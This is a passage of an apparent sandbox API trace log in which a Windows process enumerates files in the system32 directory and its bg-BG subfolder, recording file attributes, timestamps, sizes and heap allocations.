(lpString="AuthFWWizFwk.dll") returned 16 [0025.934] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xa2) returned 0x5d8808 [0025.934] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8acdeb81, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8acdeb81, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ad04ce2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1b5800, dwReserved0=0x0, dwReserved1=0x0, cFileName="authui.dll", cAlternateFileName="")) returned 1 [0025.934] lstrlenW (lpString="authui.dll") returned 10 [0025.934] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x96) returned 0x5d44a0 [0025.934] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x714738cc, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x714738cc, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x80ac71d0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x18200, dwReserved0=0x0, dwReserved1=0x0, cFileName="authz.dll", cAlternateFileName="")) returned 1 [0025.934] lstrlenW (lpString="authz.dll") returned 9 [0025.934] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x94) returned 0x5d4540 [0025.934] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85d92e0f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x85d92e0f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85f5be93, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="autochk.exe", cAlternateFileName="")) returned 1 [0025.934] lstrlenW (lpString="autochk.exe") returned 11 [0025.934] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5d45e0 [0025.934] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8332c5e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8332c5e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x83352741, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="autoconv.exe", cAlternateFileName="")) returned 1 [0025.934] lstrlenW (lpString="autoconv.exe") returned 12 [0025.934] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d6a90 [0025.934] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85cae5ce, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x85cae5ce, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85cd472e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa0e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="autofmt.exe", cAlternateFileName="")) returned 1 [0025.935] lstrlenW (lpString="autofmt.exe") returned 11 [0025.935] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5d4680 [0025.935] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9bee9c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a9bee9c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a9bee9c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="autoplay.dll", cAlternateFileName="")) returned 1 [0025.935] lstrlenW (lpString="autoplay.dll") returned 12 [0025.935] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d6b38 [0025.935] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc3f99b, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xfdc3f99b, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x80b12cc0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1d400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuxiliaryDisplayApi.dll", cAlternateFileName="")) returned 1 [0025.935] lstrlenW (lpString="AuxiliaryDisplayApi.dll") returned 23 [0025.935] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xb0) returned 0x5d88b8 [0025.935] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67a8ae8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb67a8ae8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb67cec49, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuxiliaryDisplayCpl.dll", cAlternateFileName="")) returned 1 [0025.935] lstrlenW (lpString="AuxiliaryDisplayCpl.dll") returned 23 [0025.935] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xb0) returned 0x5d8970 [0025.935] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8898fb50, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8898fb50, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x80c1ce90, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xfe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="avicap32.dll", cAlternateFileName="")) returned 1 [0025.935] lstrlenW (lpString="avicap32.dll") returned 12 [0025.935] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d6be0 [0025.935] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b15f501, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9b15f501, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9b185661, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x16600, dwReserved0=0x0, dwReserved1=0x0, cFileName="avifil32.dll", cAlternateFileName="")) returned 1 [0025.935] lstrlenW (lpString="avifil32.dll") returned 12 [0025.935] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d6c88 [0025.935] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb761c16, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb761c16, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x80d75260, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="avrt.dll", cAlternateFileName="")) returned 1 [0025.935] lstrlenW (lpString="avrt.dll") returned 8 [0025.935] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x92) returned 0x5d4720 [0025.935] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1533a9b1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x1533a9b1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x5df3f69c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0xa273, dwReserved0=0x0, dwReserved1=0x0, cFileName="azman.msc", cAlternateFileName="")) returned 1 [0025.935] lstrlenW (lpString="azman.msc") returned 9 [0025.935] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849c970b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x849c970b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x849ef86b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xba400, dwReserved0=0x0, dwReserved1=0x0, cFileName="azroles.dll", cAlternateFileName="")) returned 1 [0025.935] lstrlenW (lpString="azroles.dll") returned 11 [0025.935] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5d47c0 [0025.936] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ba1c5fa, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8ba1c5fa, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ba4275a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4cc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="azroleui.dll", cAlternateFileName="")) returned 1 [0025.936] lstrlenW (lpString="azroleui.dll") returned 12 [0025.936] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d6d30 [0025.936] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849a35ab, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x849a35ab, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x849c970b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AzSqlExt.dll", cAlternateFileName="")) returned 1 [0025.936] lstrlenW (lpString="AzSqlExt.dll") returned 12 [0025.936] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d6dd8 [0025.936] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9afe273e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9afe273e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9afe273e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23580, dwReserved0=0x0, dwReserved1=0x0, cFileName="basecsp.dll", cAlternateFileName="")) returned 1 [0025.936] lstrlenW (lpString="basecsp.dll") returned 11 [0025.936] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5d4860 [0025.936] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86b8ef69, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x86b8ef69, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x86bb50c9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb4e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="batmeter.dll", cAlternateFileName="")) returned 1 [0025.936] lstrlenW (lpString="batmeter.dll") returned 12 [0025.936] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d6e80 [0025.936] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b43e34, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x40b43e34, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xff749c50, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x13c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bcrypt.dll", cAlternateFileName="")) returned 1 [0025.936] lstrlenW (lpString="bcrypt.dll") returned 10 [0025.936] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x96) returned 0x5d4900 [0025.936] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46f17635, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x46f17635, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xea1f1abe, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3cf50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bcryptprimitives.dll", cAlternateFileName="")) returned 1 [0025.937] lstrlenW (lpString="bcryptprimitives.dll") returned 20 [0025.937] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xaa) returned 0x5d8a28 [0025.937] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6d4c3e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xfa6d4c3e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x6459c5f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12200, dwReserved0=0x0, dwReserved1=0x0, cFileName="bdaplgin.ax", cAlternateFileName="")) returned 1 [0025.937] lstrlenW (lpString="bdaplgin.ax") returned 11 [0025.937] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24d65dc, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x24d65dc, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0025.937] lstrlenW (lpString="bg-BG") returned 5 [0025.937] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x250) returned 0x5d8ae0 [0025.937] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\bg-BG\\*", lpFindFileData=0x5d8ae0 | out: lpFindFileData=0x5d8ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24d65dc, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x24d65dc, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5ce0d8 [0025.937] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d8ae0 | out: lpFindFileData=0x5d8ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24d65dc, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x24d65dc, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0025.938] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d8ae0 | out: lpFindFileData=0x5d8ae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9a0e36a, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc9d07ed6, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc9d07ed6, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="comctl32.dll.mui", cAlternateFileName="")) returned 1 [0025.938] lstrlenW (lpString="comctl32.dll.mui") returned 16 [0025.938] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d8ae0 | out: lpFindFileData=0x5d8ae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcafeccf7, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xcb56dfb2, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xcb56dfb2, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="comdlg32.dll.mui", cAlternateFileName="")) returned 1 [0025.938] lstrlenW (lpString="comdlg32.dll.mui") returned 16 [0025.938] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d8ae0 | out: lpFindFileData=0x5d8ae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4221919, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc45ffcbf, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc45ffcbf, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fms.dll.mui", cAlternateFileName="")) returned 1 [0025.938] lstrlenW (lpString="fms.dll.mui") returned 11 [0025.938] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d8ae0 | out: lpFindFileData=0x5d8ae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca478364, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xca8305ab, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xca8305ab, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlang.dll.mui", cAlternateFileName="")) returned 1 [0025.938] lstrlenW (lpString="mlang.dll.mui") returned 13 [0025.938] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d8ae0 | out: lpFindFileData=0x5d8ae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7a11ca1, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc7fdf21a, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc7fdf21a, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x16000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msimsg.dll.mui", cAlternateFileName="")) returned 1 [0025.938] lstrlenW (lpString="msimsg.dll.mui") returned 14 [0025.938] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d8ae0 | out: lpFindFileData=0x5d8ae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7a11ca1, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc7fdf21a, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc7fdf21a, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x16000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msimsg.dll.mui", cAlternateFileName="")) returned 0 [0025.938] FindClose (in: hFindFile=0x5ce0d8 | out: hFindFile=0x5ce0d8) returned 1 [0025.938] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8ae0 | out: hHeap=0x5a0000) returned 1 [0025.938] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x943ab875, ftCreationTime.dwHighDateTime=0x1ca0418, ftLastAccessTime.dwLowDateTime=0x943ab875, ftLastAccessTime.dwHighDateTime=0x1ca0418, ftLastWriteTime.dwLowDateTime=0x81bbbef0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x8600, dwReserved0=0x0, dwReserved1=0x0, cFileName="bidispl.dll", cAlternateFileName="")) returned 1 [0025.938] lstrlenW (lpString="bidispl.dll") returned 11 [0025.938] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5d49a0 [0025.938] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6b6860f, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xd6b6860f, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x81ced1c0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x29e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BioCredProv.dll", cAlternateFileName="")) returned 1 [0025.938] lstrlenW (lpString="BioCredProv.dll") returned 15 [0025.938] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xa0) returned 0x5d6f28 [0025.938] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e5d9a8a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8e5d9a8a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8e5d9a8a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsadmin.exe", cAlternateFileName="")) returned 1 [0025.938] lstrlenW (lpString="bitsadmin.exe") returned 13 [0025.938] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9c) returned 0x5d6fd0 [0025.939] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a972bdb, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a972bdb, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a972bdb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsperf.dll", cAlternateFileName="")) returned 1 [0025.939] lstrlenW (lpString="bitsperf.dll") returned 12 [0025.939] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d7078 [0025.939] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc757d6b0, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc757d6b0, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81d5fdb0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx2.dll", cAlternateFileName="")) returned 1 [0025.939] lstrlenW (lpString="bitsprx2.dll") returned 12 [0025.939] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d7120 [0025.939] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc74befd5, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc74befd5, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81d847a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx3.dll", cAlternateFileName="")) returned 1 [0025.939] lstrlenW (lpString="bitsprx3.dll") returned 12 [0025.939] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d71c8 [0025.939] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7afe96b, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc7afe96b, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81d847a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx4.dll", cAlternateFileName="")) returned 1 [0025.939] lstrlenW (lpString="bitsprx4.dll") returned 12 [0025.939] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d7270 [0025.939] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89b9128, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc89b9128, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81dab8a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx5.dll", cAlternateFileName="")) returned 1 [0025.939] lstrlenW (lpString="bitsprx5.dll") returned 12 [0025.939] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d7318 [0025.939] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc91e7c91, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc91e7c91, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81dd29a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2800, 